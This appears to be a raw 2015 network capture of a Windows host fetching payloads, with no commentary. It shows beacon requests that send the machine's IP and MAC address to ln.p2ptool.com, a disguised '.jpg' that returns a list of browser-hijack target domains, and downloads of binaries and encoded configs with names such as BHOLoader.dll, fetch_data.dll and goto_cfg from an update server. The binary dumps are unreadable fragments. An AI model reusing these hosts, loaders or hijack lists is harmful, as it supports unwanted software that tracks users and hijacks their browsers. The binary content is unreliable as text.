No2jqKBv8Ztb v psEtsTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWGxEKfoBEbH/iKDnmhUe
QSvE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5DV89XbEJ509fciHFohbrUKQo3SDfcckk0Q
LBQpmZkn1zTZVpHtvDynQRoV7CxP E/mxZqCXYR7KIWNX8fr6MQC8DLejYMRbS5B1WxoKL
egZBeMSPxMQxasgm6nQO23Q3oGXGco vnawTsm/ZT2FfXZE8kq pcz0Hcz/UlH 3yO
<<< skipped >>>


GET /txt/multi_150601.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=EDEE2EE5CE37A121ABE9AA1C85922CDA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 3747852
Last-Modified: Tue, 02 Jun 2015 03:08:56 GMT
Connection: close
ETag: "556d1e48-39300c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WsUwC6UEPuUHwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnLEwXHZOeqxhaNHsFJPygV5N5GdwjtmQLE/qfU9Hv
R8A9sSORw exnVF6psBA56drufRlRCIZxMrNCb9pdZ SzG7SnYDX74h7v9V 2E2jzr/jtM
OEVDZTCvvCVqqMAS/u1iz4mhopJO0A557 PzIRYanKixfw4v1nkqb RqxQHMI8TazQ2ZSP
lrueKHSyn HxKzdxPJVb22ufdg0 sDpLF9xs2uTSe47l/L3vgIuX1hA3mn IohxMHsWCHV
8ybcrb2XJyfQNpBOtYm ARi1SoBtib4BGLVKgG0MdvCiDwkpTIr4wJH vtXy6wxom51VeV
brDGibnVV5VlEmG8hVGu5ExNrNDZlI WvjQ iArxdhdB5i9zYlh3A/xNrNDZlI WvE2s0N
mUj5a7E6Lj14vcKCvHloLLTHJfDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrMeSNkdky0GDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr/scZcqI
ZVXzpChets/4fM3E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPWwmwgWD4ygf/KbOy3dpQoDxN
rNDZlI WvqkpwmtYwEg/WqE7QcsrWW ACc 6GEp9BGwDLuSqumXcTazQ2ZSPlrcLYj0lqr
lCI/Rp3LuKWWWFMf2YO529Rm65lMOiWA47XE2s0NmUj5a qSnCa1jASD 8BgGQTR5rVH p
JjTqpJgKRlBXEZaF DxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a80g7PwSDjpKaHUjqrw7Cn5TosG6X1WJKNGb
DqOkocKG/Y20xSgdf/GEPDtVCynaMmR5x49eQN1kRmLhlwYHh/dn/gQ8oBRhRdkyin3v0 
abkZX9CUqPKznL5y1ptSZhF 0fIc aBDnuaZ F3oOzw8FQu4ds/WP4kJLioQCSs4YA
<<< skipped >>>


GET /asb/apro.jpg HTTP/1.1
Accept: */*
Referer: hXXp://VVV.92zy.com/asb/apro.jpg
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Host: VVV.92zy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Wed, 03 Jun 2015 02:46:13 GMT
Content-Type: image/jpeg
Content-Length: 202
Last-Modified: Sat, 28 Mar 2015 09:48:14 GMT
Connection: keep-alive
ETag: "551678de-ca"
Expires: Fri, 03 Jul 2015 02:46:13 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
about:..res:..baidu.com..123.sogou.com..hao123.com..icafe..1x3x.com..h
ttps://..VVV.sohu.com..VVV.sina.com..qq.com..taobao.com..tmall.com..c:
..javascript:..VVV.1x3xxx.com..adpubs.yaolan.com..92tezheng.ma..



GET /txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache

GET /txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:24 GMT
Content-Type: text/plain
Content-Length: 71356
Last-Modified: Fri, 29 May 2015 03:54:18 GMT
Connection: close
ETag: "5567e2ea-116bc"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLDnfyUHo1L2rgykKjEqfmpq7bcvyu
OAbNWi0f4vD5S3GA jKk SLSSdkwRO7vkhVfkkyCAvWyVuXynxcnYiazqGPqoc49OClLzt
WlDZ12mHAnlforgf7zQ6V1c9o lLAbDRZFT2CIbJmqQmrWWV/ahkveKFZZtCKNxyE11iaS
fexm44r2ObaL17YA0WBF/CmK S5mnOOUdpOuZ2HgP60hW4BaxQmDgbVnq0d15lVGosELU/
92 QSlmcMj7bo9QsO6Pwk2kKXPvQb9oW9RvnvCiKddSP5OfdGwk7dGWHkiysufVgHxAFfj
Nzgdxyf09u/1twsXmGbDvMaKtoP2CwD6idva 2Y2XLu2zkMwBvp LQcnt3PX9Mw8tsIjtV
s4tu3fKUoe2g92NlUsMSnT2sczOAFELEmZgER YfMYX8ZsD2RJIbzfb PVf9j8Y5pxJ rh
AdidFlga1wJjSZI0ZOiQOknDc0pwLp3f2PxjmnEn6uEDU5sANNjc39bR09zcG9D7JZgVvP
cKlAIh UYD6IMDRYEwA7BYvcP1gWqmYzB6K1iBnKNJsAgR2WmRADv7S4Gn9F0lmIy49S4G
 /Izdz4HyquyiPz1M0HqipwM2j4C3gFseQd56LPRg3w7dtro2zf7MSFUnCs2VbAN ApRJc
yCSFlNdX1UBtpX1lrzwxNP2Xw/E82OARqd7OP9UcgcVFarVvvyM3c B8qqhDFZc1qnKKZ8
ij1EiIq87SoYvkcPDj0zit8bCNKNJywv6br9luOyoD5j0IJcHAtXOJG13P7Zj01r2GOOSH
iy4fPSocCXIgzBJyd7I/PRMI 6A  sMU1MDC6grdH/yBJPyaUMSCxbjh1ybvySc7PVMI7H
t N8xPXgr53YH5vJMzJRN5xlbKsBR850bBJNl5xxXLTJfmtbGvg3Yroza4iDjS8OPx9IED
bZZqtQCVSmfp7adQzfP 9zsCneIliciUhbKkA /qTsrmJebjsXPgVaVbDzqY/kg1GxaFkW
8GBBKLxaekEpRydKri3/9JQFIJpKviNhiG4lGUujm24y3kfObcWkTOpTw1jAZRxyObL8lC
8paDFiG2Yv0KHLA3FEp1QlOWnsx6VWakSmmrRGOdxPMFzN4ilyaLS5E/7Vm5alNnhjDe/y
4Gr5s/1RyBxUVqtVyBN3LV5cWd/s8xj4k1JNYqeyHHr1Hj 23W7KPTgk7wNTdzWHJvSBme
NzWc5kDyd9N 7EprsNyLhza9pSCVncipMW49ywvdOTKhBG/c5YxsI/4mPO01uKUF7Y6WmI
tj5qiw/8Ttv3VRObeWcEEZfkPT8Y/Gzz/znAKd4iWJyJSF5QEDQqBYLwqqKVwpBO8TJWM0
SrN0V 5NpqdGuQAJ0b8BZ5puXacqoGM0SrN0V 5No103z0CC5kOyTR3R 1t1yBZSovhA/N
feOK3xsI0o0nLu mN5aCoABKej0dpkceFXYzRKs3RX7k12w5Jk96 1b0LXbHHmzkyi
<<< skipped >>>


GET /bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:39 GMT
Content-Type: application/octet-stream
Content-Length: 57209
Connection: keep-alive
X-Request-Id: 5b480a8636a9c82ad77a71c0d3687a89; aaf93b24edaacbea60fd3cf9a984ca16; f5aed991e02259cc470b700031d517ff
X-Source: U/200
Last-Modified: Thu, 04 Sep 2014 01:22:39 GMT
Expires: Wed, 10 Jun 2015 14:10:58 GMT
Cache-Control: max-age=686094
Accept-Ranges: bytes
Age: 40235
X-Cache: MISS|MISS from cache_img_88; MISS(S)|HIT from cun-sd-tao-076; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot 
be run in DOS mode....$Z.....t.ap'.....}|'.ap'F}~'.ap'.Gz'.ap'.~{'.ap'
Ki/..QFi-'.8.1q'.(..{0..:At'.ap'RichT..g.....PE..L...c..T..r...!......
...`..................(.....0....!............)..8................E...
....d......_............1...........text................. ..`.rdata...
.............R@..@.'...DS... [email protected]. ...`[email protected]
.................g...D$....V3............T$.RP.t$..Q........0D$.#.....
.#....SR.T$.Rj.P.Q...uZ.\$...uR.D$...t0.T$.F.....RSP....u..D$...t...P.
Q........P...R..D$..T$.X.%..Z. t.....P...Q...[^..........Q.D$.V3.;.tc.
.p.Rhh.......t. |L....;.tD.T$..t$...Rh(#.p.Q...|"....;.t..L$.QP.......
.D$......P......G^[email protected].
..S^.3.^F..QSUVW3...`9...|$ .\[email protected]$.UWQ........ 
.P.....X.A.D$....P...8.g_..^][.......L$.j.PQ.....M.....j.h....d...@Pd.
%.......SV..W.t$..F.P.......D$.3.j..|$([email protected] .~$.^(.D$$..
..t....L$..~`.N\.~d.~h.T$..D$.RPhp ...D$0........~l.|$..|$ ..f....t..D
$.;.t.P...........<m.........._^[d...."..a.rQ.. ..........V........
D$..t.V..iA.Q.^...................|$........G`[email protected].&
lt;.t.......Q.m^....O(.w`.wd.wh......_ .o..D$ ..3;.t....6P...........;
.u..M.Q.*C.....3.W.E..E...v.L$._^]..!..P.....VWh. ...C(.{(h.......\$..
P............>.......j.V.5..............h| ..;....R.%.....Cp....2. 
.][email protected]...\....I.....v..uh...K...t).A!..."<.t...uI..
U.A....g....\$._^].Cl[Y...u.j....M....C....w.;.s.".. ...U....*...{
<<< skipped >>>

GET /browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat HTTP/1.1


Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:44 GMT
Content-Type: application/octet-stream
Content-Length: 414887
Connection: keep-alive
X-Request-Id: e53d8163bbd3bca64131c4ac67b2412a; 9149848c88d3fd6ca3e92456c0b77697; 8dc45fba0af04f124afa4838b4ec2b90
X-Source: U/200
Last-Modified: Tue, 21 Apr 2015 09:19:56 GMT
Expires: Fri, 05 Jun 2015 10:16:32 GMT
Cache-Control: max-age=667295
Accept-Ranges: bytes
Age: 467507
X-Cache: MISS(S)|MISS from ctn-zj-hgh-092; HIT|MISS from cun-sd-tao-070; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot 
be run in DOS mode....$Z...dD...*......T....*.Y.....*[email protected]........
&.*..}. .Q.}...@.. ...*..r...([email protected]....
.6U.............r...p.....*.........&....a...... ....2. .U......)..,..
=..........P.....C.@.........$:HC...............text...lq.......0... .
.`[email protected]@..@.'....H..............%..6....rsrc......
,.!.. .....P........F..h.}G......Y.....h..............................
.f@~G.............f..G......`...........o..f .G.._.......O.....%H.h.%H
...H.G.P..L.G....I....-U......P.H.3..E..E.P..<.G..E.h..G....I......
.M....3........]@..j.hjQG.d....PK.`P.E.d.....h.'H.j$h..I..E......t...3
....8..'H..7....D....I.Ph......b..h..G...4.I6.....x.......M.d.....Y...
..0..X..............h<.I.....(..... [email protected]@.'.. [email protected]...$.
.E.....j.j...:..h.L.g8.I...).....`..G..L...]........h..I........$..G..
6[. h....*[email protected]...^[email protected]...<...h0.I..
...G..h$]. .... h...........I..%...h8...... [email protected]..."..L......
.-.....`...o... [email protected]........$......\$H.D$H...-........QU
..V.u...tP...r...;.u..........s....t5..:.u'...t*.A.:B.u....t..A.:B.u..
..t..A.:B.t......^].3.^].`..........E..t.V.b...h.^].....x....y.....U..
j.h.?`.3...c.V.E.VWh.....}.j..u.....k.0.F.).r.F...F...p..3..F....Df.F.
.F.f.F .F$.F(.F,.F0.E....u(.E..E...H.P.M..i...h..H..E..E...H.P.jT..WV.
............_^.M.3..~.P......V..V......F,.....t.P.0...0.F,..2.F$......
...2.F...............#..E....2.F..........#.Fs...........^.....p..
<<< skipped >>>

GET /config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat HTTP/1.1


Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:51 GMT
Content-Type: application/octet-stream
Content-Length: 16021
Connection: keep-alive
X-Request-Id: c72c8390de4e17724de7685b042d0ab3; eb12280e9a2f424ebe112d688c68fea1; f8cc4faca9efb76ee37aa23448c9214b; c5debba4eac524c91ad94922bf47e895
X-Source: U/200
Last-Modified: Tue, 28 Apr 2015 09:53:39 GMT
Expires: Sun, 07 Jun 2015 13:27:51 GMT
Cache-Control: max-age=656634
Accept-Ranges: bytes
Age: 272574
X-Cache: HIT|HIT from cache_img_86; MISS(S)|HIT from cun-sd-tao-074; MISS|HIT from usn-us-sms-098
.GEMCF...q.KQBJ!FNpm$ \OpC..Z.TSN0....Y)[email protected][email protected]_.N..ES.K1
.HB..u[ML..Y.CSRV0....7@GJY.].SHBI4.XB.A .@@L.Y.KLNT'$...R)YT.L.B.....
#[email protected][M7V..R.f.MJUH..;.O[/...Y.=ANS...T..DU-]\Z..m.....E.XK
PMnQH.Q.p@F[].]..[CS#NDXNM1C.HT.N.X.......\[email protected]?A.LN...H.A..
C.l.qV...KOH..5.Y).....M"I[QQ.m.P@F._IGSJ.....P.o....S.J....s..`*OL..R
......<CJD.[pMLB]S.S......JIQ.m...E.K.]UI]mW..S.k2.UB.K..~.p...P..F
6..Z.po.....B~...F7V\..D4WZ.B.G.SKP.q.XBNM0RTXVO..aI%@YN.....L..W...J!
RX..A3$....WLUS.F.N.C"YTX.....RBN<TE.U.)L [email protected].
[email protected]@..<V\ZNXl...B.H.A^(..~.`WH..F.$.;oVIV.17C.z.@..
O.D....A.U.h...9C.@Y_.3N..X.=@_XC.D.AD.Y.][email protected].@:HEK.\pMM.O.
O.Q.ON-MWZ.Yp...V.Z.qY._7OM.R..UI^%Y.Z.I9BNV.Q)D..XD..V.]IL]H.s.....h.
..T.K.Y/[email protected]@.W~.q...O7JVl...F]UR/LN..
G0OM..Q$.r.^.I1[......0VQCz....FO.O.{KE.(UFA..l..DD.E...z.`Y<BLYD..
..NT$DS..].V..E.Q^Fd.E..J.l.B.XO/..Q.PL..H.P]1ILZ ... .....G:........Z
.Xr.J.P.h....W.^....#.H...sOE$...h....^sD..R.mJ....IU..C.$.I.MH<..K
GS._....#B...Hl..K.U.PE...yG..T.n..M.Y...Z._q.....:.FMD......[m..KY.=.
B..V.R...."E.N..o.A..QHT....#B..RJi..N.U.VB...xE..Y.=...D.......p..HQH
=K.J.Y.J.ZB.w...V.j.......F.._t.MK..jKFM.L._...^y..N.O=..M.W..G.AXt...
..g...C.O.._.XqGO.TKm..ICRLP....#C....<.B..Y..._..&E....sJ.MCY.R.X.
\%.H...;..LCXNQF^E.#...M.mO...QI..X.\u...!Hi....Lk.....v.jKW.n..v.`L]H
.r....1q.WA.X._....u~..T.f....>.^....y..rM.f....R.8....r...Vqs....S
.T.c..`E.Ao......H.OUYm...P.k..p.X.^....Z...X.g....>.^....x..rM
<<< skipped >>>

GET /dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat HTTP/1.1


Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:55 GMT
Content-Type: application/octet-stream
Content-Length: 227879
Connection: keep-alive
X-Request-Id: d5941be296a7c272f10744274c1725a2; 3d3e824cb3467a9fb63057493af2f01f; 8d24d23f7c67e8c505ebe2e94e3d5363; 405cf54c09a2caa748497801b9acab61
X-Source: U/200
Last-Modified: Tue, 20 Jan 2015 08:16:57 GMT
Expires: Mon, 08 Jun 2015 01:24:50 GMT
Cache-Control: max-age=667973
Accept-Ranges: bytes
Age: 240898
X-Cache: HIT|MISS from ctn-zj-hgh-091; HIT|HIT from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
[email protected]...........!..L.!This program cannot b
e run in DOS mode....$Z..Hv....f...Q.E.....1..G.......f..o.....1...0..
g.q.f.)`.....1...0.....1.....1)`[email protected].......!.
....:...x.............P*.!....R..... [email protected].........
[email protected].. R..8.....:.....BP...........text....9
............. ..`.rdata......Z....>).R@..@.'. ..U.. ...R.....M..(..
..rsrc......,..X([email protected]...\(..BY.....)..h......\P..h.H...
*...Y......j.h......d....(..h.&...&...j.j......hpH..........C...U.....
.E.P..DP...E.h I....Q...........]r.uhPI....B. [email protected].%...P.
..h`...k........(.....u..............hp.....!.:1. h{=.........."......
.......h....... h.......p.......".....&........V3...tR.:.tM...&.E.PVh.
...VVVRQ.. P....uO.u..u..u.P.u..u....P...u......`.D....H. .^6..0.bj..u
.Q/..,..&..........`[email protected]
.u..M..u.QVVP...... .E-..P$..Q..3........U.........p ..3..E.SW........
..........W..|................Ph....j.WS.............P..V...I......q..
[email protected][email protected]:..uE.... ..%...W.......t.-......
_[.M.3........].W....0...........w.........M._3.[.b......... .).. .pV.
............................;.......Wj\S..V...............G...........
.......... .;..G.....VSP..........,....B.....5:....N...F..u. ......=..
...VWP..=...=...=..n..b..... [email protected]...#...............Qh....j.PV..`.
[email protected]. .......RJ..u.".PSP.........t(G..t
.3......_.#_^..".....v..G..-....-.... .^......U.............@$.E..
<<< skipped >>>

GET /fetch_data/2014-08-21_17_15_35_123/fetch_data.dll HTTP/1.1


Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:00 GMT
Content-Type: application/octet-stream
Content-Length: 128931
Connection: keep-alive
X-Request-Id: 4f2430bbe391f89e8b8a81ccc80dc396; 456202ee7534af014907b39d32ee5e85
X-Source: U/200
Last-Modified: Thu, 21 Aug 2014 09:15:37 GMT
Expires: Wed, 10 Jun 2015 15:58:08 GMT
Cache-Control: max-age=672278
Accept-Ranges: bytes
Age: 20012
X-Cache: MISS|MISS from ctn-zj-hgh-093, MISS|MISS from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
[email protected]...........!..L.!This program cannot b
e run in DOS mode....$Z.............p.q.......i....1W.....V.%.....5...
.1%[email protected][email protected]......!..
....................0.......`...........2.0.M.... @. ..,.....@...... .
..h.......x..0..(.........,...02..8.....:(....B0...........text.......
........... ..`.rdata....................R@..@.'....\9............(...
.rsrc......t...([email protected]..............(..B......%..hp).......Y.....h`
.......P........%X.......h.............|.....u......h...l...h.).....!.
.1. h.=..........s.............h....].. h....Q..p......."......;...}..
....U..j.h....d.....P...VW.p...3.P.E.d.......}..E...0.E.)..j..G......G
....h<........-...}...E.(..Iv0.E..0;.t'.I.j.j..F...P.!'..j.h.......
#&...6;u.u..M.......u............M.d......Y_^..]......v...j.hx..b.....
[email protected]..$.;.0..B%.1.......P
........0................p.......i......D$,..$....P...0...D$.{.......0
...=.0..h0......=6.............. .;L$,.......^...L$l..$....y.`...D$|..
..D$l... ...D$...C.D$ ...;.........D$(...1....L$(.........s.F..L$()...
.D$d.t$.....P..t..L$(.=3.....F8...|$t.t!.|$x....d.CD$dP.0...h.....@...
......u.L$...,...Z..x.r..t$d...x.2.=4..@.........#A...D$0P.L$H..C...&l
t;........C.......$.{....D$8..P.......$..........D$D$... ..x ..L$l....
...@....@...$....tbh......$.e.P.$.......P.>9......D$|..$........|Ph
......$....h....P...C......6.%..6...^.._i..$.8i..d...f.MdPh0f...f...j.
!;[email protected]$xe.0.D$..a..D$d...2|.. .a.L$<.....*......-..|......
<<< skipped >>>

GET /goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat HTTP/1.1


Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:05 GMT
Content-Type: application/octet-stream
Content-Length: 252624
Connection: keep-alive
X-Request-Id: c4109171c08354e3f45a1ad9c1f52117; f79cf9d216a55a01bdd5fcf0ac5989ae; 42d75530002f19947f0d3f973db1e3b6
X-Source: U/200
Last-Modified: Wed, 04 Mar 2015 03:08:51 GMT
Expires: Wed, 10 Jun 2015 00:02:59 GMT
Cache-Control: max-age=679033
Accept-Ranges: bytes
Age: 84080
X-Cache: MISS|MISS from cache_img_87; HIT|HIT from cun-tj-tsn-073; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot 
be run in DOS mode....$Z..H.jt.q.'...)..'.q.'J .'......'.q.'...'.q.'.#
.'/..1.'.....'.q.'...'...1.'.P.1.'[email protected].'...1.'.0.....1)....@Rich|.....
.PE..L....t.T.......!........................:.!....R..... ....2...].q
[email protected]@...K....ZP...;......:.M...O....
P.......text.................. ..`.rdata..|...Z.....).R@..@.'.0.H. ...
[email protected]..(.`@.relo).......]<....(..BY........
h.........Y.....h............o......._.......O..e@....?...&U......E.P.
.D....E.h.....`.............][email protected]. .... h...................
....p.l.....:..........h.....t.....$..................2.....@..!....j.
...X$.....P$...F...H...T...L....h@$...........h....._....%...?...h....
)...f.....u......U...E..V........t.V....&.g.^]...-..0...E..U....H.].. 
......U.....u.R.P..U..H.;J.u...;.u.....9."2....X.....`..;H.u...;E.u...
-....`....L.......U..QV.u..E......$=...u........L...E..F......Fb......
.:.u.3.QR...[.....^......W.y...A..u. ._"..9"......$.E...V{.c..u(j.u.#.
.w..h.L........q.uPV.:.....O...M.../n<....{o......Y"..U..V.u.V..;..
......E..0t..@.....^..D.@[email protected]........_.
...W.z...Bs.!._ ... ..X.....V...~..r..6.P....j..^...#U..S.].VW...M..{.
;....... .9}..B}.;.uG...9F......._....F.r...Qj........u..._..^[]......
..\..............F.;.s$.v...W......M...tj.{..r...e...r*...(..u..~....r
..._....g.r._^[...s....t.W...PR.h.....D...~.r.....8/..,.........h M...
i3...._......;'3....0...}..VW.}...t"e...r.S....t.WSV...}.AS...~.C[
<<< skipped >>>

GET /goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat HTTP/1.1


Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:13 GMT
Content-Type: application/octet-stream
Content-Length: 7776
Connection: keep-alive
X-Request-Id: a453f74a7d64b13acad0d504fc582b16; 7a396f845a2e2492b4377a23a2ac0097; 2e004e7f159702521d50c479b24d71ce; cbbc5f57908fd61fe43f33dfaf374b42
X-Source: U/200
Last-Modified: Tue, 02 Jun 2015 08:12:04 GMT
Expires: Tue, 09 Jun 2015 22:18:45 GMT
Cache-Control: max-age=655565
Accept-Ranges: bytes
Age: 66874
X-Cache: MISS|HIT from ctn-zj-hgh-096; MISS|HIT from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
...............................O)...$k....62a8^&Q23.I14.....#p...bI...
).W.iXB....P..mL.$....TX"...b...... .s..m_P.\.".a......>.I.i.....F.
.b........"3.`xf.[.."X..w.#@P*@%...#.e.G.`L*X.A.....Y.A.....v.(..../.n
..!O...]j....`\x...e..;.F.k.6..a..5......-?s....y.h..7.[.....8.......%
5..q.....~2.!..a.P........9.t.. ..`Q...P......ZFC9b.Q$4L.ot.V.._..(.K|
.H...B.2&..>...X...<...n..ah/..=..i.?5S.c.PA..."...4 @..B)......
.....,.g-hv..rh*...5...T.&uY@... |Pf..#.~.u...#..rv.t'\.dx`...........
....e.}C.L.........2.n=.bl..o;....#fk<O.ySh.c.....R. ...G...G...U.i
.........|4...6........E)...o........E?..q!.x...............#..Z.4f..f
.W...H#.....t.R.......H...u..V)D.<*V....3Y.....]...{t.T`.tw..&Jm...
.G...... ..f..*C....\....A....8.$............d[=.....5...*}.0....\..^.
...L..Eb....0......j..b.R@..]....i [I.......3........._..q......,.....
.5o.......lh..m.|...dP,....XJ...&..O..y.............".....}|.:I.S...J.
?A..dk......#6'.% 0b~....l..k.n`..-...Tmvy....:.}.t.....&..]......$...
.....I....*.`.D.<.R...p'_Z..`..p..:.b 0.l.G.. .........;.g..x....'.
...a.yAU8.G...4y...{........n...!..e\F.....8.~....d...4....HX.E(e.D..0
_?.I.Ml1..R.%!.{....G%E...&.u.6...s...c.........#J0d..\...n.y..X.D.9s.
.......E...C.P..._&p.k.e.{7..p.K...Hd...Oh..j...Q........P./ <=.<
;..K.`.m..X.w....U<.T..$....'Ry..yb!.)Z}..__..^.e.............F.ud.
.F.Ri..._........]..;.....}..........D.......^/. ..}.......$.....xq.).
.s..e*..'iQ....a....:...Fm.......}^....`..`<Z.......)T.>......c.
../...........h....|M..5Y.F0......QA2.....HS.........H.......C....
<<< skipped >>>

GET /hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat HTTP/1.1


Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:20 GMT
Content-Type: application/octet-stream
Content-Length: 451789
Connection: keep-alive
X-Request-Id: 38052415f2f5c34fab65f2b0289cd2ce; 6b0210e182a42e6a5622ee22e84cacfa; 2c570de857ed50be654376b6abf88f3a; 84017f0f5a95c2a62480852635ed69da
X-Source: U/200
Last-Modified: Fri, 10 Oct 2014 08:08:52 GMT
Expires: Sun, 07 Jun 2015 01:09:06 GMT
Cache-Control: max-age=681976
Accept-Ranges: bytes
Age: 342272
X-Cache: MISS|HIT from ctn-zj-hgh-095; HIT|HIT from cun-tj-tsn-070; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This minibox cannot 
be run in DOS mode....$Z..G......F...P..F...F...F......F...F. .F...F$"
[email protected]][email protected]......
....... [email protected]....! ...Q...............4...
.....P(...TS.R...LPl....!:.o..._0..0.J....text...6............. ..`.rd
ata..$..........R@..@.'[email protected]....`......P...
.................O...u.3...A .......D$.P.....Y..................A j.P.
.p8A.,............T$..T$..p.........t....Q.P......P....<.....QV...N
....PQ.D$...........t..F... ^Yk.....0...n0..._......t.P..T0A..F ...X0A
..N(^.%l1A.]..%.....(.D$,.L$0.D$.3.PP.T$4R.L$.P.L$.QP.D$.(...f.D$$....
& ..D$(.D$,.D:...4.D$8.D$<..P0A...(...GQ.T$.3.9L$...$....D$..D$..L$
.;..L$..T$.u....P.S..U.l$.V.0W.y.U.h..@. .U .P.A..I.R.T$0V.... .P .QWS
R...6A._^][Y.j.h..A.d.X...P...VW.(.A.3.P.D$.d........t$..D$(Ph........
.3..N|.|$ ...:A...|[email protected]....... .`........!.......
[email protected][email protected]$4..E....T$.R..x8A..D$..L$..F
